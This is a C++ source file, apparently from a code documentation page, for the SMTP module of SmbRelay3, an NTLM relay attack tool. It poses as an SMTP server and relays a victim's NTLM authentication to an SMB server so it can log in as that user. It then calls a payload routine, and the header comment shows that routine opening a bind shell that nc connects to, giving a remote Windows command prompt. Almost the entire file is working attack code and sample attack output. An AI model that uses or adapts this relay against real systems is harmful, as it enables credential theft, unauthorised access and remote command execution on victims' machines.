Smbrelay version 3: C:/Web/smbrelay3/src/smtprelay.cpp Source File

00001 /*
00002     SMBRelay3 - SMTP REPLAY ATTACK MODULE
00003     -------------------------------------
00004 
00005 
00006 C:\smbrelay>smbrelay3.exe --ListForSMTPRequests
00007 SmbRelay3 - SMB to SMB and HTTP to SMB replay attack
00008  (c) 2007 - 2008 Andres Tarasco - atarasco@gmail.com
00009  Website: http://www.tarasco.org
00010 
00011 [+] Accepted Connection - Replaying against 192.168.47.128
00012 [+] Sending SMTP Banner
00013 [+] Answering EHLO command with an AUTH NTLM parameter
00014 [+] received AUTH NTLM message
00015 [+] Sending SMB Protocol Authentication Handshake
00016 [+] Received SMB Message with NTLM message type 2 packet
00017 [+] Replaying NTLM Challenge from SMB Server to the SMTP Client
00018 [+] Trying to authenticate to remote SMB as Administrador
00019 [+] Sending Final SMB Authentication packet with NTLM Message type 3
00020 [+] SessionSetupAndX Completed
00021 [+] Authenticacion against 192.168.47.128 Succeed with username Administrador
00022 [+] *** Remote SmbRelay3 BindShell Service Running ***: (192.168.47.128:8080)
00023 
00024 C:\smbrelay>nc 192.168.47.128 8080
00025 Microsoft Windows 2000 [Versi�n 5.00.2195]
00026 (C) Copyright 1985-2000 Microsoft Corp.
00027 
00028 C:\WINNT\system32>
00029 
00030 */
00031 
00032 
00033 #include "smtprelay.h"
00034 #include "payload.h"
00035 
00036 extern int verbose;
00037 
00038 int HandleIncommingSMTPRequest(RELAY *relay, char *destinationhostname, int destinationport)
00039 {
00040         char buffer[4096];
00041         char buf[4096];
00042         char buf1[4096];
00043         char buf2[4096];
00044 
00045         char CurrentUserName[256];
00046         char CurrentDomain[256];
00047         char CurrentWorkstation[256];
00048         smheader *SmbPacket1, *SmbPacket2, *SmbPacket3, *NegotiateProtocol;
00049     tSmbNtlmAuthRequest *request;
00050         
00051         uint16 packetlen;
00052         int i;
00053     char *p;
00054         const char WelcomeMessage[]= "220 Microsoft ESMTP MAIL Service ready\n";
00055         const char AUTHMessage[]= "250-server.example.com Hello [10.10.2.20]\r\n250 AUTH NTLM\r\n";
00056 
00057     printf("[+] Sending SMTP Banner\n");
00058     i=SendBytesAndWaitForResponse(relay->source,(char*)WelcomeMessage, (int)strlen(WelcomeMessage), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00059         if (i<=0){
00060                 printf("Error Reading EHLO message\n");
00061         return(0);
00062         }
00063     printf("[+] Answering EHLO command with an AUTH NTLM parameter\n");
00064     memset(buffer,'\0',sizeof(buffer));
00065     i=SendBytesAndWaitForResponse(relay->source,(char*)AUTHMessage, (int)strlen(AUTHMessage), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00066         if (i<=0){
00067                 printf("[-] Error reading client AUTH NTLM message\n");
00068         return(0);
00069         }
00070         if (memcmp(buffer,"AUTH NTLM",9)!=0) {
00071                 printf("[-] AUTH NTLM packet not received from client\n");
00072         i=SendBytesAndWaitForResponse(relay->source,(char*)"504 Unrecognized authentication type.\r\n", (int)39, buffer,sizeof(buffer),SMBWAITTIMEOUT);
00073         return(0);
00074         }
00075     if (strlen(buffer)>12) {
00076         printf("[+] received AUTH NTLM message\n");
00077 
00078         memset((char*)&buf1,'\0',sizeof(buf1));
00079             packetlen=from64tobits(buf1, buffer+12);
00080         request=(tSmbNtlmAuthRequest *)buf1;
00081         dumpAuthRequest(0,request);
00082     } else {
00083         memset(buffer,'\0',sizeof(buffer));
00084         i=SendBytesAndWaitForResponse(relay->source,(char*)"334 NTLM Auth allowed\r\n", (int)23, buffer,sizeof(buffer),SMBWAITTIMEOUT);
00085         if (i<=0){
00086                     printf("[-] Error Auth response with NTLM type1 packet\n");
00087             return(0);
00088             }
00089         printf("[+] received AUTH NTLM message\n");
00090         memset((char*)&buf1,'\0',sizeof(buf1));
00091             packetlen=from64tobits(buf1, buffer);        
00092         request=(tSmbNtlmAuthRequest *)buf1;
00093         
00094         if (debug) {
00095             printf("[+] received AUTH NTLM message: %s\n",buffer);
00096             DumpMem(buf1,packetlen);
00097             dumpAuthRequest(0,request);
00098         }
00099     }
00100 
00101 
00102         //Init Replay Attack
00103     i=ConnectToRemoteHost(relay,destinationhostname,destinationport);
00104         if (!i) {
00105                 printf("[-] Unable to connect to remote host %s:%i\n",destinationhostname,destinationport); 
00106                 return(0);
00107         }
00108         printf("[+] Sending SMB Protocol Authentication Handshake\n");
00109     p = AddDialect(NULL,"PC NETWORK PROGRAM 1.0",0x02, &i);
00110     p = AddDialect(p,"LANMAN1.0", 0x02,&i);
00111     p = AddDialect(p,"Windows for Workgroups 3.1a", 0x02,&i);
00112     p = AddDialect(p,"LM1.2X002", 0x02,&i);
00113     p = AddDialect(p,"LANMAN2.1", 0x02,&i);
00114     p = AddDialect(p,"NT LM 0.12", 0x02,&i);
00115         NegotiateProtocol=BuildSmbPacket(NULL,NEGOTIATEPROTOCOLREQUEST,0,p,i);
00116     free(p);
00117     i=SendBytesAndWaitForResponse(relay->destination,(char*)NegotiateProtocol,SmbPacketLen(NegotiateProtocol),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
00118     free(NegotiateProtocol);
00119         if (i<=0){
00120                 printf("[-] Initial SMBHandShake (LanManager Negotiation) Failed\n");
00121         return(0);
00122         }
00123         
00124         SmbPacket1=BuildSmbPacket1();
00125         if (debug)  {
00126                 printf("\n[+] Dumping SMB Packet With NTLM Message Type 1\n");
00127                 DumpMem((char*)SmbPacket1,SmbPacketLen(SmbPacket1));
00128         }
00129 
00130         SmbPacket2=GetSmbPacket2(relay,SmbPacket1);
00131         if  (SmbPacket2==NULL) {
00132                 printf("[-] Unable to receive SMB Packet with NTLM Message Type 2\n");
00133         return(0);
00134         }
00135         printf("[+] Received SMB Message with NTLM message type 2 packet\n");
00136         memcpy((char*)&packetlen,GetNTLMPacketFromSmbPacket(SmbPacket2)-4,2);
00137 
00138     if (debug) {
00139         printf("[*] SMB Packet Dump:\n");
00140         DumpMem((char*)SmbPacket2,SmbPacketLen(SmbPacket2));
00141         printf("[*] NTLM Challenge packet from SMB message\n");
00142         DumpMem((char*)GetNTLMPacketFromSmbPacket(SmbPacket2),packetlen);
00143         dumpAuthChallenge(0,(tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2));
00144     }
00145                 
00146     ((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2))->flags=0xb207;
00147         memset(buf1,'\0',sizeof(buf1));
00148         to64frombits((unsigned char*)&buf1, (unsigned char*)GetNTLMPacketFromSmbPacket(SmbPacket2), packetlen);
00149         sprintf(buf,"334 %s\r\n",buf1);
00150 
00151         printf("[+] Replaying NTLM Challenge from SMB Server to the SMTP Client\n");
00152         if (debug)
00153         {
00154                 printf("[+] Sending SMTP Response: %s\n",buf);
00155         }   
00156     i=SendBytesAndWaitForResponse(relay->source,(char*)buf,(int)strlen(buf),(char*)buffer,sizeof(buffer),SMBWAITTIMEOUT);
00157         if (i<=0)
00158         {
00159                 printf("[-] Unable to read NTLM packet 3 from smtp client\n");
00160         return(0);
00161         }
00162     buffer[i]='\0';
00163 
00164     if (debug) printf("[*] Response: %s\n",buffer);
00165         memset((char*)&buf1,'\0',sizeof(buf1));
00166         packetlen=from64tobits(buf1, buffer);
00167     if (debug) {
00168         
00169                     printf("[*] Raw authorization packet (len: %i)\n",packetlen);
00170                     DumpMem(buf1,packetlen);
00171             dumpAuthResponse(0,(tSmbNtlmAuthResponse*)buf1);    
00172         }
00173 
00174     
00175         GetNTLMPacketInfo((tSmbNtlmAuthResponse*)buf1,(char*)&CurrentUserName, (char*)&CurrentDomain, (char*)&CurrentWorkstation,verbose);
00176         printf("[+] Trying to authenticate to remote SMB as %s\n",CurrentUserName);
00177         buildAuthResponse((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2),(tSmbNtlmAuthResponse*)buf2,0,CurrentUserName,NULL,NULL,CurrentWorkstation, (tSmbNtlmAuthResponse*)buf1);
00178     SmbPacket3=BuildSmbPacket((smheader*)SmbPacket2,SESSIONSETUPANDX,0,buf2,(int)SmbLength((tSmbNtlmAuthResponse *)buf2));
00179     
00180 
00181         printf("[+] Sending Final SMB Authentication packet with NTLM Message type 3\n");
00182         if (debug) 
00183         {
00184                 DumpMem((char*)SmbPacket3, SmbPacketLen(SmbPacket3));
00185         }
00186 
00187     i=SendBytesAndWaitForResponse(relay->destination,(char*)SmbPacket3, SmbPacketLen(SmbPacket3),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
00188         if (i<=0){
00189                 printf("[-] Error reading Server Authentication Response\n");
00190         return(0);
00191         }
00192         if (debug)  {
00193                 printf("[*] SessionSetupAndX Completed - Dumping received packet\n");
00194                 DumpMem(buf,i);
00195         }
00196 
00197         if (((smheader*)buf)->NtStatus!=0x00000000) {
00198                 printf("[-] SessionSetupAndX Completed\n[-] Authentication against Remote Host Failed\n");
00199         return(0);
00200         }
00201     if ( ((SessionSetupAndXResponse*)((smheader*)buf)->buffer)->Action & 0x0001 )
00202     {
00203          printf("[-] Authentication against Remote Host Failed. (Connected as Guest)\n");
00204          
00205         return(0);
00206     }
00207                 
00208         //WriteDataToReportFile("log.txt", (tSmbNtlmAuthResponse*)buf1, destinationhostname,(unsigned char*)((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2))->challengeData);
00209         
00210         printf("[+] SessionSetupAndX Completed \n");
00211         printf("[+] Authenticacion against %s Succeed with username %s\n",destinationhostname,CurrentUserName);
00212 
00213         ExecuteCode( *relay);
00214 
00215 
00216 
00217         
00218 
00219 
00220         return(0);
00221 
00222 }
00223